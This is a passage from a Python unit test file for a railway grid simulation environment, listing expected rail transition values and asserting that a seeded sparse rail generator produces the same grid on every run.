expected_grid_map[4][39] = 34864
expected_grid_map[4][40] = 32872
expected_grid_map[4][41] = 4608
expected_grid_map[5][6] = 49186
expected_grid_map[5][7] = 3089
expected_grid_map[5][8] = 3089
expected_grid_map[5][9] = 1025
expected_grid_map[5][10] = 1025
expected_grid_map[5][11] = 1025
expected_grid_map[5][12] = 1025
expected_grid_map[5][13] = 4608
expected_grid_map[5][18] = 32800
expected_grid_map[5][19] = 32800
expected_grid_map[5][20] = 32800
expected_grid_map[5][38] = 32800
expected_grid_map[5][39] = 32800
expected_grid_map[5][40] = 32800
expected_grid_map[5][41] = 32800
expected_grid_map[6][6] = 32800
expected_grid_map[6][13] = 32800
expected_grid_map[6][18] = 32800
expected_grid_map[6][19] = 49186
expected_grid_map[6][20] = 34864
expected_grid_map[6][38] = 72
expected_grid_map[6][39] = 37408
expected_grid_map[6][40] = 49186
expected_grid_map[6][41] = 2064
expected_grid_map[7][6] = 32800
expected_grid_map[7][13] = 32800
expected_grid_map[7][18] = 32872
expected_grid_map[7][19] = 37408
expected_grid_map[7][20] = 32800
expected_grid_map[7][39] = 32872
expected_grid_map[7][40] = 37408
expected_grid_map[8][5] = 16386
expected_grid_map[8][6] = 34864
expected_grid_map[8][13] = 32800
expected_grid_map[8][18] = 49186
expected_grid_map[8][19] = 34864
expected_grid_map[8][20] = 32800
expected_grid_map[8][39] = 49186
expected_grid_map[8][40] = 2064
expected_grid_map[9][5] = 32800
expected_grid_map[9][6] = 32872
expected_grid_map[9][7] = 4608
expected_grid_map[9][13] = 32800
expected_grid_map[9][18] = 32800
expected_grid_map[9][19] = 32800
expected_grid_map[9][20] = 32800
expected_grid_map[9][39] = 32800
expected_grid_map[10][5] = 32800
expected_grid_map[10][6] = 32800
expected_grid_map[10][7] = 32800
expected_grid_map[10][13] = 72
expected_grid_map[10][14] = 1025
expected_grid_map[10][15] = 1025
expected_grid_map[10][16] = 1025
expected_grid_map[10][17] = 1025
expected_grid_map[10][18] = 34864
expected_grid_map[10][19] = 32800
expected_grid_map[10][20] = 32800
expected_grid_map[10][37] = 16386
expected_grid_map[10][38] = 1025
expected_grid_map[10][39] = 34864
expected_grid_map[11][5] = 32800
expected_grid_map[11][6] = 49186
expected_grid_map[11][7] = 2064
expected_grid_map[11][18] = 49186
expected_grid_map[11][19] = 3089
expected_grid_map[11][20] = 2064
expected_grid_map[11][32] = 16386
expected_grid_map[11][33] = 1025
expected_grid_map[11][34] = 1025
expected_grid_map[11][35] = 1025
expected_grid_map[11][36] = 1025
expected_grid_map[11][37] = 38505
expected_grid_map[11][38] = 1025
expected_grid_map[11][39] = 2064
expected_grid_map[12][5] = 72
expected_grid_map[12][6] = 37408
expected_grid_map[12][18] = 32800
expected_grid_map[12][32] = 32800
expected_grid_map[12][37] = 32800
expected_grid_map[13][6] = 32800
expected_grid_map[13][18] = 32800
expected_grid_map[13][32] = 32800
expected_grid_map[13][37] = 32872
expected_grid_map[13][38] = 4608
expected_grid_map[14][6] = 32800
expected_grid_map[14][18] = 32800
expected_grid_map[14][32] = 32800
expected_grid_map[14][37] = 49186
expected_grid_map[14][38] = 34864
expected_grid_map[15][6] = 32872
expected_grid_map[15][7] = 1025
expected_grid_map[15][8] = 1025
expected_grid_map[15][9] = 5633
expected_grid_map[15][10] = 4608
expected_grid_map[15][18] = 32800
expected_grid_map[15][22] = 16386
expected_grid_map[15][23] = 1025
expected_grid_map[15][24] = 4608
expected_grid_map[15][32] = 32800
expected_grid_map[15][36] = 16386
expected_grid_map[15][37] = 34864
expected_grid_map[15][38] = 32872
expected_grid_map[15][39] = 4608
expected_grid_map[16][6] = 72
expected_grid_map[16][7] = 1025
expected_grid_map[16][8] = 1025
expected_grid_map[16][9] = 37408
expected_grid_map[16][10] = 49186
expected_grid_map[16][11] = 1025
expected_grid_map[16][12] = 1025
expected_grid_map[16][13] = 1025
expected_grid_map[16][14] = 1025
expected_grid_map[16][15] = 1025
expected_grid_map[16][16] = 1025
expected_grid_map[16][17] = 1025
expected_grid_map[16][18] = 1097
expected_grid_map[16][19] = 1025
expected_grid_map[16][20] = 5633
expected_grid_map[16][21] = 17411
expected_grid_map[16][22] = 3089
expected_grid_map[16][23] = 1025
expected_grid_map[16][24] = 1097
expected_grid_map[16][25] = 5633
expected_grid_map[16][26] = 17411
expected_grid_map[16][27] = 1025
expected_grid_map[16][28] = 5633
expected_grid_map[16][29] = 1025
expected_grid_map[16][30] = 1025
expected_grid_map[16][31] = 1025
expected_grid_map[16][32] = 2064
expected_grid_map[16][36] = 32800
expected_grid_map[16][37] = 32800
expected_grid_map[16][38] = 32800
expected_grid_map[16][39] = 32800
expected_grid_map[17][9] = 32800
expected_grid_map[17][10] = 32800
expected_grid_map[17][20] = 72
expected_grid_map[17][21] = 3089
expected_grid_map[17][22] = 5633
expected_grid_map[17][23] = 1025
expected_grid_map[17][24] = 17411
expected_grid_map[17][25] = 1097
expected_grid_map[17][26] = 2064
expected_grid_map[17][28] = 32800
expected_grid_map[17][36] = 72
expected_grid_map[17][37] = 37408
expected_grid_map[17][38] = 49186
expected_grid_map[17][39] = 2064
expected_grid_map[18][9] = 32872
expected_grid_map[18][10] = 37408
expected_grid_map[18][22] = 72
expected_grid_map[18][23] = 1025
expected_grid_map[18][24] = 2064
expected_grid_map[18][28] = 32800
expected_grid_map[18][37] = 32872
expected_grid_map[18][38] = 37408
expected_grid_map[19][9] = 49186
expected_grid_map[19][10] = 34864
expected_grid_map[19][28] = 32800
expected_grid_map[19][37] = 49186
expected_grid_map[19][38] = 2064
expected_grid_map[20][9] = 32800
expected_grid_map[20][10] = 32800
expected_grid_map[20][28] = 32800
expected_grid_map[20][37] = 32800
expected_grid_map[21][9] = 32800
expected_grid_map[21][10] = 32800
expected_grid_map[21][26] = 16386
expected_grid_map[21][27] = 17411
expected_grid_map[21][28] = 2064
expected_grid_map[21][37] = 32872
expected_grid_map[21][38] = 4608
expected_grid_map[22][9] = 32800
expected_grid_map[22][10] = 32800
expected_grid_map[22][26] = 32800
expected_grid_map[22][27] = 32800
expected_grid_map[22][37] = 32800
expected_grid_map[22][38] = 32800
expected_grid_map[23][9] = 32872
expected_grid_map[23][10] = 37408
expected_grid_map[23][26] = 32800
expected_grid_map[23][27] = 32800
expected_grid_map[23][37] = 32800
expected_grid_map[23][38] = 32800
expected_grid_map[24][9] = 49186
expected_grid_map[24][10] = 34864
expected_grid_map[24][26] = 32800
expected_grid_map[24][27] = 32800
expected_grid_map[24][37] = 32800
expected_grid_map[24][38] = 32800
expected_grid_map[25][9] = 32800
expected_grid_map[25][10] = 32800
expected_grid_map[25][24] = 16386
expected_grid_map[25][25] = 1025
expected_grid_map[25][26] = 2064
expected_grid_map[25][27] = 32800
expected_grid_map[25][37] = 32800
expected_grid_map[25][38] = 32800
expected_grid_map[26][6] = 16386
expected_grid_map[26][7] = 17411
expected_grid_map[26][8] = 1025
expected_grid_map[26][9] = 34864
expected_grid_map[26][10] = 32800
expected_grid_map[26][23] = 16386
expected_grid_map[26][24] = 33825
expected_grid_map[26][25] = 1025
expected_grid_map[26][26] = 1025
expected_grid_map[26][27] = 2064
expected_grid_map[26][37] = 32800
expected_grid_map[26][38] = 32800
expected_grid_map[27][6] = 32800
expected_grid_map[27][7] = 32800
expected_grid_map[27][8] = 16386
expected_grid_map[27][9] = 33825
expected_grid_map[27][10] = 2064
expected_grid_map[27][23] = 32800
expected_grid_map[27][24] = 32800
expected_grid_map[27][37] = 32800
expected_grid_map[27][38] = 32800
expected_grid_map[28][6] = 32800
expected_grid_map[28][7] = 32800
expected_grid_map[28][8] = 32800
expected_grid_map[28][9] = 32800
expected_grid_map[28][23] = 32872
expected_grid_map[28][24] = 37408
expected_grid_map[28][37] = 32800
expected_grid_map[28][38] = 32800
expected_grid_map[29][6] = 32800
expected_grid_map[29][7] = 32800
expected_grid_map[29][8] = 32800
expected_grid_map[29][9] = 32800
expected_grid_map[29][23] = 49186
expected_grid_map[29][24] = 34864
expected_grid_map[29][37] = 32800
expected_grid_map[29][38] = 32800
expected_grid_map[30][6] = 32800
expected_grid_map[30][7] = 32800
expected_grid_map[30][8] = 32800
expected_grid_map[30][9] = 32800
expected_grid_map[30][22] = 16386
expected_grid_map[30][23] = 34864
expected_grid_map[30][24] = 32872
expected_grid_map[30][25] = 4608
expected_grid_map[30][37] = 32800
expected_grid_map[30][38] = 72
expected_grid_map[30][39] = 1025
expected_grid_map[30][40] = 1025
expected_grid_map[30][41] = 1025
expected_grid_map[30][42] = 1025
expected_grid_map[30][43] = 1025
expected_grid_map[30][44] = 1025
expected_grid_map[30][45] = 1025
expected_grid_map[30][46] = 1025
expected_grid_map[30][47] = 1025
expected_grid_map[30][48] = 4608
expected_grid_map[31][6] = 32800
expected_grid_map[31][7] = 32800
expected_grid_map[31][8] = 32800
expected_grid_map[31][9] = 32800
expected_grid_map[31][22] = 32800
expected_grid_map[31][23] = 32800
expected_grid_map[31][24] = 32800
expected_grid_map[31][25] = 32800
expected_grid_map[31][37] = 32872
expected_grid_map[31][38] = 1025
expected_grid_map[31][39] = 1025
expected_grid_map[31][40] = 1025
expected_grid_map[31][41] = 1025
expected_grid_map[31][42] = 1025
expected_grid_map[31][43] = 1025
expected_grid_map[31][44] = 1025
expected_grid_map[31][45] = 1025
expected_grid_map[31][46] = 1025
expected_grid_map[31][47] = 1025
expected_grid_map[31][48] = 37408
expected_grid_map[32][6] = 32800
expected_grid_map[32][7] = 32800
expected_grid_map[32][8] = 32800
expected_grid_map[32][9] = 32800
expected_grid_map[32][22] = 72
expected_grid_map[32][23] = 37408
expected_grid_map[32][24] = 49186
expected_grid_map[32][25] = 2064
expected_grid_map[32][37] = 72
expected_grid_map[32][38] = 4608
expected_grid_map[32][48] = 32800
expected_grid_map[33][6] = 32800
expected_grid_map[33][7] = 32800
expected_grid_map[33][8] = 32800
expected_grid_map[33][9] = 32800
expected_grid_map[33][23] = 32872
expected_grid_map[33][24] = 37408
expected_grid_map[33][38] = 32800
expected_grid_map[33][48] = 32800
expected_grid_map[34][6] = 32800
expected_grid_map[34][7] = 49186
expected_grid_map[34][8] = 3089
expected_grid_map[34][9] = 2064
expected_grid_map[34][23] = 49186
expected_grid_map[34][24] = 34864
expected_grid_map[34][38] = 32800
expected_grid_map[34][48] = 32800
expected_grid_map[35][6] = 32800
expected_grid_map[35][7] = 32800
expected_grid_map[35][23] = 32800
expected_grid_map[35][24] = 32800
expected_grid_map[35][38] = 32800
expected_grid_map[35][48] = 32800
expected_grid_map[36][6] = 32872
expected_grid_map[36][7] = 37408
expected_grid_map[36][22] = 16386
expected_grid_map[36][23] = 38505
expected_grid_map[36][24] = 33825
expected_grid_map[36][25] = 1025
expected_grid_map[36][26] = 1025
expected_grid_map[36][27] = 1025
expected_grid_map[36][28] = 1025
expected_grid_map[36][29] = 1025
expected_grid_map[36][30] = 4608
expected_grid_map[36][31] = 16386
expected_grid_map[36][32] = 1025
expected_grid_map[36][33] = 1025
expected_grid_map[36][34] = 1025
expected_grid_map[36][35] = 1025
expected_grid_map[36][36] = 1025
expected_grid_map[36][37] = 1025
expected_grid_map[36][38] = 1097
expected_grid_map[36][39] = 1025
expected_grid_map[36][40] = 5633
expected_grid_map[36][41] = 17411
expected_grid_map[36][42] = 1025
expected_grid_map[36][43] = 1025
expected_grid_map[36][44] = 1025
expected_grid_map[36][45] = 5633
expected_grid_map[36][46] = 17411
expected_grid_map[36][47] = 1025
expected_grid_map[36][48] = 34864
expected_grid_map[37][6] = 49186
expected_grid_map[37][7] = 34864
expected_grid_map[37][22] = 32800
expected_grid_map[37][23] = 32800
expected_grid_map[37][24] = 32872
expected_grid_map[37][25] = 1025
expected_grid_map[37][26] = 1025
expected_grid_map[37][27] = 1025
expected_grid_map[37][28] = 1025
expected_grid_map[37][29] = 4608
expected_grid_map[37][30] = 32800
expected_grid_map[37][31] = 32800
expected_grid_map[37][32] = 16386
expected_grid_map[37][33] = 1025
expected_grid_map[37][34] = 1025
expected_grid_map[37][35] = 1025
expected_grid_map[37][36] = 1025
expected_grid_map[37][37] = 1025
expected_grid_map[37][38] = 17411
expected_grid_map[37][39] = 1025
expected_grid_map[37][40] = 1097
expected_grid_map[37][41] = 3089
expected_grid_map[37][42] = 1025
expected_grid_map[37][43] = 1025
expected_grid_map[37][44] = 1025
expected_grid_map[37][45] = 1097
expected_grid_map[37][46] = 3089
expected_grid_map[37][47] = 1025
expected_grid_map[37][48] = 2064
expected_grid_map[38][6] = 32800
expected_grid_map[38][7] = 32872
expected_grid_map[38][8] = 4608
expected_grid_map[38][22] = 32800
expected_grid_map[38][23] = 32800
expected_grid_map[38][24] = 32800
expected_grid_map[38][29] = 32800
expected_grid_map[38][30] = 32800
expected_grid_map[38][31] = 32800
expected_grid_map[38][32] = 32800
expected_grid_map[38][38] = 32800
expected_grid_map[39][6] = 32800
expected_grid_map[39][7] = 32800
expected_grid_map[39][8] = 32800
expected_grid_map[39][22] = 32800
expected_grid_map[39][23] = 32800
expected_grid_map[39][24] = 72
expected_grid_map[39][25] = 1025
expected_grid_map[39][26] = 1025
expected_grid_map[39][27] = 1025
expected_grid_map[39][28] = 1025
expected_grid_map[39][29] = 1097
expected_grid_map[39][30] = 38505
expected_grid_map[39][31] = 3089
expected_grid_map[39][32] = 2064
expected_grid_map[39][38] = 32800
expected_grid_map[40][6] = 32800
expected_grid_map[40][7] = 49186
expected_grid_map[40][8] = 2064
expected_grid_map[40][22] = 32800
expected_grid_map[40][23] = 32800
expected_grid_map[40][30] = 32800
expected_grid_map[40][38] = 32800
expected_grid_map[41][6] = 32872
expected_grid_map[41][7] = 37408
expected_grid_map[41][22] = 32800
expected_grid_map[41][23] = 32800
expected_grid_map[41][30] = 32872
expected_grid_map[41][31] = 4608
expected_grid_map[41][38] = 32800
expected_grid_map[42][6] = 49186
expected_grid_map[42][7] = 34864
expected_grid_map[42][22] = 32800
expected_grid_map[42][23] = 32800
expected_grid_map[42][30] = 49186
expected_grid_map[42][31] = 34864
expected_grid_map[42][38] = 32800
expected_grid_map[43][6] = 32800
expected_grid_map[43][7] = 32800
expected_grid_map[43][11] = 16386
expected_grid_map[43][12] = 1025
expected_grid_map[43][13] = 1025
expected_grid_map[43][14] = 1025
expected_grid_map[43][15] = 1025
expected_grid_map[43][16] = 1025
expected_grid_map[43][17] = 1025
expected_grid_map[43][18] = 1025
expected_grid_map[43][19] = 1025
expected_grid_map[43][20] = 1025
expected_grid_map[43][21] = 1025
expected_grid_map[43][22] = 2064
expected_grid_map[43][23] = 32800
expected_grid_map[43][30] = 32800
expected_grid_map[43][31] = 32800
expected_grid_map[43][38] = 32800
expected_grid_map[44][6] = 72
expected_grid_map[44][7] = 1097
expected_grid_map[44][8] = 1025
expected_grid_map[44][9] = 1025
expected_grid_map[44][10] = 1025
expected_grid_map[44][11] = 3089
expected_grid_map[44][12] = 1025
expected_grid_map[44][13] = 1025
expected_grid_map[44][14] = 1025
expected_grid_map[44][15] = 1025
expected_grid_map[44][16] = 1025
expected_grid_map[44][17] = 1025
expected_grid_map[44][18] = 1025
expected_grid_map[44][19] = 1025
expected_grid_map[44][20] = 1025
expected_grid_map[44][21] = 1025
expected_grid_map[44][22] = 1025
expected_grid_map[44][23] = 2064
expected_grid_map[44][30] = 32800
expected_grid_map[44][31] = 32800
expected_grid_map[44][38] = 32800
expected_grid_map[45][30] = 32800
expected_grid_map[45][31] = 32800
expected_grid_map[45][38] = 32800
expected_grid_map[46][30] = 32872
expected_grid_map[46][31] = 37408
expected_grid_map[46][38] = 32800
expected_grid_map[47][30] = 49186
expected_grid_map[47][31] = 2064
expected_grid_map[47][38] = 32800
expected_grid_map[48][30] = 32800
expected_grid_map[48][38] = 32800
expected_grid_map[49][30] = 72
expected_grid_map[49][31] = 1025
expected_grid_map[49][32] = 1025
expected_grid_map[49][33] = 1025
expected_grid_map[49][34] = 1025
expected_grid_map[49][35] = 1025
expected_grid_map[49][36] = 1025
expected_grid_map[49][37] = 1025
expected_grid_map[49][38] = 2064
# Attention, once we have fixed the generator this needs to be changed!!!!
expected_grid_map = env.rail.grid
assert np.array_equal(env.rail.grid, expected_grid_map), "actual={}, expected={}".format(env.rail.grid,
expected_grid_map)
s0 = 0
s1 = 0
for a in range(env.get_num_agents()):
s0 = Vec2d.get_manhattan_distance(env.agents[a].initial_position, (0, 0))
s1 = Vec2d.get_chebyshev_distance(env.agents[a].initial_position, (0, 0))
assert s0 == 79, "actual={}".format(s0)
assert s1 == 43, "actual={}".format(s1)
def test_sparse_rail_generator_deterministic():
"""Check that sparse_rail_generator runs deterministic over different python versions!"""
speed_ration_map = {1.: 1., # Fast passenger train
1. / 2.: 0., # Fast freight train
1. / 3.: 0., # Slow commuter train
1. / 4.: 0.} # Slow freight train
env = RailEnv(width=25, height=30, rail_generator=sparse_rail_generator(max_num_cities=5,
max_rails_between_cities=3,
seed=215545, # Random seed
grid_mode=True
),
schedule_generator=sparse_schedule_generator(speed_ration_map), number_of_agents=1)
env.reset()
# for r in range(env.height):
# for c in range(env.width):
# print("assert env.rail.get_full_transitions({}, {}) == {}, \"[{}][{}]\"".format(r, c,
# env.rail.get_full_transitions(
# r, c), r, c))
assert env.rail.get_full_transitions(0, 0) == 0, "[0][0]"
assert env.rail.get_full_transitions(0, 1) == 0, "[0][1]"
assert env.rail.get_full_transitions(0, 2) == 0, "[0][2]"
assert env.rail.get_full_transitions(0, 3) == 0, "[0][3]"
assert env.rail.get_full_transitions(0, 4) == 0, "[0][4]"
assert env.rail.get_full_transitions(0, 5) == 0, "[0][5]"
assert env.rail.get_full_transitions(0, 6) == 0, "[0][6]"
assert env.rail.get_full_transitions(0, 7) == 0, "[0][7]"
assert env.rail.get_full_transitions(0, 8) == 0, "[0][8]"
assert env.rail.get_full_transitions(0, 9) == 0, "[0][9]"
assert env.rail.get_full_transitions(0, 10) == 0, "[0][10]"
assert env.rail.get_full_transitions(0, 11) == 0, "[0][11]"
assert env.rail.get_full_transitions(0, 12) == 0, "[0][12]"
assert env.rail.get_full_transitions(0, 13) == 0, "[0][13]"
assert env.rail.get_full_transitions(0, 14) == 0, "[0][14]"
assert env.rail.get_full_transitions(0, 15) == 0, "[0][15]"
assert env.rail.get_full_transitions(0, 16) == 0, "[0][16]"
assert env.rail.get_full_transitions(0, 17) == 0, "[0][17]"
assert env.rail.get_full_transitions(0, 18) == 0, "[0][18]"
assert env.rail.get_full_transitions(0, 19) == 0, "[0][19]"
assert env.rail.get_full_transitions(0, 20) == 0, "[0][20]"
assert env.rail.get_full_transitions(0, 21) == 0, "[0][21]"
assert env.rail.get_full_transitions(0, 22) == 0, "[0][22]"
assert env.rail.get_full_transitions(0, 23) == 0, "[0][23]"
assert env.rail.get_full_transitions(0, 24) == 0, "[0][24]"
assert env.rail.get_full_transitions(1, 0) == 0, "[1][0]"
assert env.rail.get_full_transitions(1, 1) == 0, "[1][1]"
assert env.rail.get_full_transitions(1, 2) == 0, "[1][2]"
assert env.rail.get_full_transitions(1, 3) == 0, "[1][3]"
assert env.rail.get_full_transitions(1, 4) == 0, "[1][4]"
assert env.rail.get_full_transitions(1, 5) == 0, "[1][5]"
assert env.rail.get_full_transitions(1, 6) == 0, "[1][6]"
assert env.rail.get_full_transitions(1, 7) == 0, "[1][7]"
assert env.rail.get_full_transitions(1, 8) == 0, "[1][8]"
assert env.rail.get_full_transitions(1, 9) == 0, "[1][9]"
assert env.rail.get_full_transitions(1, 10) == 0, "[1][10]"
assert env.rail.get_full_transitions(1, 11) == 16386, "[1][11]"
assert env.rail.get_full_transitions(1, 12) == 1025, "[1][12]"
assert env.rail.get_full_transitions(1, 13) == 1025, "[1][13]"
assert env.rail.get_full_transitions(1, 14) == 17411, "[1][14]"
assert env.rail.get_full_transitions(1, 15) == 1025, "[1][15]"
assert env.rail.get_full_transitions(1, 16) == 1025, "[1][16]"
assert env.rail.get_full_transitions(1, 17) == 1025, "[1][17]"
assert env.rail.get_full_transitions(1, 18) == 1025, "[1][18]"
assert env.rail.get_full_transitions(1, 19) == 4608, "[1][19]"
assert env.rail.get_full_transitions(1, 20) == 0, "[1][20]"
assert env.rail.get_full_transitions(1, 21) == 0, "[1][21]"
assert env.rail.get_full_transitions(1, 22) == 0, "[1][22]"
assert env.rail.get_full_transitions(1, 23) == 0, "[1][23]"
assert env.rail.get_full_transitions(1, 24) == 0, "[1][24]"
assert env.rail.get_full_transitions(2, 0) == 0, "[2][0]"
assert env.rail.get_full_transitions(2, 1) == 0, "[2][1]"
assert env.rail.get_full_transitions(2, 2) == 0, "[2][2]"
assert env.rail.get_full_transitions(2, 3) == 0, "[2][3]"
assert env.rail.get_full_transitions(2, 4) == 0, "[2][4]"
assert env.rail.get_full_transitions(2, 5) == 0, "[2][5]"
assert env.rail.get_full_transitions(2, 6) == 0, "[2][6]"
assert env.rail.get_full_transitions(2, 7) == 0, "[2][7]"
assert env.rail.get_full_transitions(2, 8) == 0, "[2][8]"
assert env.rail.get_full_transitions(2, 9) == 0, "[2][9]"
assert env.rail.get_full_transitions(2, 10) == 0, "[2][10]"
assert env.rail.get_full_transitions(2, 11) == 32800, "[2][11]"
assert env.rail.get_full_transitions(2, 12) == 0, "[2][12]"
assert env.rail.get_full_transitions(2, 13) == 0, "[2][13]"
assert env.rail.get_full_transitions(2, 14) == 32800, "[2][14]"
assert env.rail.get_full_transitions(2, 15) == 0, "[2][15]"
assert env.rail.get_full_transitions(2, 16) == 0, "[2][16]"
assert env.rail.get_full_transitions(2, 17) == 0, "[2][17]"
assert env.rail.get_full_transitions(2, 18) == 0, "[2][18]"
assert env.rail.get_full_transitions(2, 19) == 32800, "[2][19]"
assert env.rail.get_full_transitions(2, 20) == 0, "[2][20]"
assert env.rail.get_full_transitions(2, 21) == 0, "[2][21]"
assert env.rail.get_full_transitions(2, 22) == 0, "[2][22]"
assert env.rail.get_full_transitions(2, 23) == 0, "[2][23]"
assert env.rail.get_full_transitions(2, 24) == 0, "[2][24]"
assert env.rail.get_full_transitions(3, 0) == 0, "[3][0]"
assert env.rail.get_full_transitions(3, 1) == 0, "[3][1]"
assert env.rail.get_full_transitions(3, 2) == 0, "[3][2]"
assert env.rail.get_full_transitions(3, 3) == 0, "[3][3]"
assert env.rail.get_full_transitions(3, 4) == 0, "[3][4]"
assert env.rail.get_full_transitions(3, 5) == 0, "[3][5]"
assert env.rail.get_full_transitions(3, 6) == 0, "[3][6]"
assert env.rail.get_full_transitions(3, 7) == 0, "[3][7]"
assert env.rail.get_full_transitions(3, 8) == 0, "[3][8]"
assert env.rail.get_full_transitions(3, 9) == 0, "[3][9]"
assert env.rail.get_full_transitions(3, 10) == 0, "[3][10]"
assert env.rail.get_full_transitions(3, 11) == 32800, "[3][11]"
assert env.rail.get_full_transitions(3, 12) == 0, "[3][12]"
assert env.rail.get_full_transitions(3, 13) == 0, "[3][13]"
assert env.rail.get_full_transitions(3, 14) == 32800, "[3][14]"
assert env.rail.get_full_transitions(3, 15) == 0, "[3][15]"
assert env.rail.get_full_transitions(3, 16) == 0, "[3][16]"
assert env.rail.get_full_transitions(3, 17) == 0, "[3][17]"
assert env.rail.get_full_transitions(3, 18) == 0, "[3][18]"
assert env.rail.get_full_transitions(3, 19) == 32872, "[3][19]"
assert env.rail.get_full_transitions(3, 20) == 4608, "[3][20]"
assert env.rail.get_full_transitions(3, 21) == 0, "[3][21]"
assert env.rail.get_full_transitions(3, 22) == 0, "[3][22]"
assert env.rail.get_full_transitions(3, 23) == 0, "[3][23]"
assert env.rail.get_full_transitions(3, 24) == 0, "[3][24]"
assert env.rail.get_full_transitions(4, 0) == 0, "[4][0]"
assert env.rail.get_full_transitions(4, 1) == 0, "[4][1]"
assert env.rail.get_full_transitions(4, 2) == 0, "[4][2]"
assert env.rail.get_full_transitions(4, 3) == 0, "[4][3]"
assert env.rail.get_full_transitions(4, 4) == 0, "[4][4]"
assert env.rail.get_full_transitions(4, 5) == 0, "[4][5]"
assert env.rail.get_full_transitions(4, 6) == 0, "[4][6]"
assert env.rail.get_full_transitions(4, 7) == 0, "[4][7]"
assert env.rail.get_full_transitions(4, 8) == 0, "[4][8]"
assert env.rail.get_full_transitions(4, 9) == 0, "[4][9]"
assert env.rail.get_full_transitions(4, 10) == 0, "[4][10]"
assert env.rail.get_full_transitions(4, 11) == 32800, "[4][11]"
assert env.rail.get_full_transitions(4, 12) == 0, "[4][12]"
assert env.rail.get_full_transitions(4, 13) == 0, "[4][13]"
assert env.rail.get_full_transitions(4, 14) == 32800, "[4][14]"
assert env.rail.get_full_transitions(4, 15) == 0, "[4][15]"
assert env.rail.get_full_transitions(4, 16) == 0, "[4][16]"
assert env.rail.get_full_transitions(4, 17) == 0, "[4][17]"
assert env.rail.get_full_transitions(4, 18) == 0, "[4][18]"
assert env.rail.get_full_transitions(4, 19) == 49186, "[4][19]"
assert env.rail.get_full_transitions(4, 20) == 34864, "[4][20]"
assert env.rail.get_full_transitions(4, 21) == 0, "[4][21]"
assert env.rail.get_full_transitions(4, 22) == 0, "[4][22]"
assert env.rail.get_full_transitions(4, 23) == 0, "[4][23]"
assert env.rail.get_full_transitions(4, 24) == 0, "[4][24]"
assert env.rail.get_full_transitions(5, 0) == 0, "[5][0]"
assert env.rail.get_full_transitions(5, 1) == 0, "[5][1]"
assert env.rail.get_full_transitions(5, 2) == 0, "[5][2]"
assert env.rail.get_full_transitions(5, 3) == 0, "[5][3]"
assert env.rail.get_full_transitions(5, 4) == 0, "[5][4]"
assert env.rail.get_full_transitions(5, 5) == 0, "[5][5]"
assert env.rail.get_full_transitions(5, 6) == 0, "[5][6]"
assert env.rail.get_full_transitions(5, 7) == 0, "[5][7]"
assert env.rail.get_full_transitions(5, 8) == 0, "[5][8]"
assert env.rail.get_full_transitions(5, 9) == 0, "[5][9]"
assert env.rail.get_full_transitions(5, 10) == 0, "[5][10]"
assert env.rail.get_full_transitions(5, 11) == 32800, "[5][11]"
assert env.rail.get_full_transitions(5, 12) == 0, "[5][12]"
assert env.rail.get_full_transitions(5, 13) == 0, "[5][13]"
assert env.rail.get_full_transitions(5, 14) == 32800, "[5][14]"
assert env.rail.get_full_transitions(5, 15) == 0, "[5][15]"
assert env.rail.get_full_transitions(5, 16) == 0, "[5][16]"
assert env.rail.get_full_transitions(5, 17) == 0, "[5][17]"
assert env.rail.get_full_transitions(5, 18) == 0, "[5][18]"
assert env.rail.get_full_transitions(5, 19) == 32800, "[5][19]"
assert env.rail.get_full_transitions(5, 20) == 32800, "[5][20]"
assert env.rail.get_full_transitions(5, 21) == 0, "[5][21]"
assert env.rail.get_full_transitions(5, 22) == 0, "[5][22]"
assert env.rail.get_full_transitions(5, 23) == 0, "[5][23]"
assert env.rail.get_full_transitions(5, 24) == 0, "[5][24]"
assert env.rail.get_full_transitions(6, 0) == 16386, "[6][0]"
assert env.rail.get_full_transitions(6, 1) == 17411, "[6][1]"
assert env.rail.get_full_transitions(6, 2) == 1025, "[6][2]"
assert env.rail.get_full_transitions(6, 3) == 5633, "[6][3]"
assert env.rail.get_full_transitions(6, 4) == 17411, "[6][4]"
assert env.rail.get_full_transitions(6, 5) == 1025, "[6][5]"
assert env.rail.get_full_transitions(6, 6) == 1025, "[6][6]"
assert env.rail.get_full_transitions(6, 7) == 1025, "[6][7]"
assert env.rail.get_full_transitions(6, 8) == 5633, "[6][8]"
assert env.rail.get_full_transitions(6, 9) == 17411, "[6][9]"
assert env.rail.get_full_transitions(6, 10) == 1025, "[6][10]"
assert env.rail.get_full_transitions(6, 11) == 3089, "[6][11]"
assert env.rail.get_full_transitions(6, 12) == 1025, "[6][12]"
assert env.rail.get_full_transitions(6, 13) == 1025, "[6][13]"
assert env.rail.get_full_transitions(6, 14) == 2064, "[6][14]"
assert env.rail.get_full_transitions(6, 15) == 0, "[6][15]"
assert env.rail.get_full_transitions(6, 16) == 0, "[6][16]"
assert env.rail.get_full_transitions(6, 17) == 0, "[6][17]"
assert env.rail.get_full_transitions(6, 18) == 0, "[6][18]"
assert env.rail.get_full_transitions(6, 19) == 32800, "[6][19]"
assert env.rail.get_full_transitions(6, 20) == 32800, "[6][20]"
assert env.rail.get_full_transitions(6, 21) == 0, "[6][21]"
assert env.rail.get_full_transitions(6, 22) == 0, "[6][22]"
assert env.rail.get_full_transitions(6, 23) == 0, "[6][23]"
assert env.rail.get_full_transitions(6, 24) == 0, "[6][24]"
assert env.rail.get_full_transitions(7, 0) == 32800, "[7][0]"
assert env.rail.get_full_transitions(7, 1) == 32800, "[7][1]"
assert env.rail.get_full_transitions(7, 2) == 0, "[7][2]"
assert env.rail.get_full_transitions(7, 3) == 72, "[7][3]"
assert env.rail.get_full_transitions(7, 4) == 3089, "[7][4]"
assert env.rail.get_full_transitions(7, 5) == 1025, "[7][5]"
assert env.rail.get_full_transitions(7, 6) == 1025, "[7][6]"
assert env.rail.get_full_transitions(7, 7) == 1025, "[7][7]"
assert env.rail.get_full_transitions(7, 8) == 1097, "[7][8]"
assert env.rail.get_full_transitions(7, 9) == 2064, "[7][9]"
assert env.rail.get_full_transitions(7, 10) == 0, "[7][10]"
assert env.rail.get_full_transitions(7, 11) == 0, "[7][11]"
assert env.rail.get_full_transitions(7, 12) == 0, "[7][12]"
assert env.rail.get_full_transitions(7, 13) == 0, "[7][13]"
assert env.rail.get_full_transitions(7, 14) == 0, "[7][14]"
assert env.rail.get_full_transitions(7, 15) == 0, "[7][15]"
assert env.rail.get_full_transitions(7, 16) == 0, "[7][16]"
assert env.rail.get_full_transitions(7, 17) == 0, "[7][17]"
assert env.rail.get_full_transitions(7, 18) == 0, "[7][18]"
assert env.rail.get_full_transitions(7, 19) == 32800, "[7][19]"
assert env.rail.get_full_transitions(7, 20) == 32800, "[7][20]"
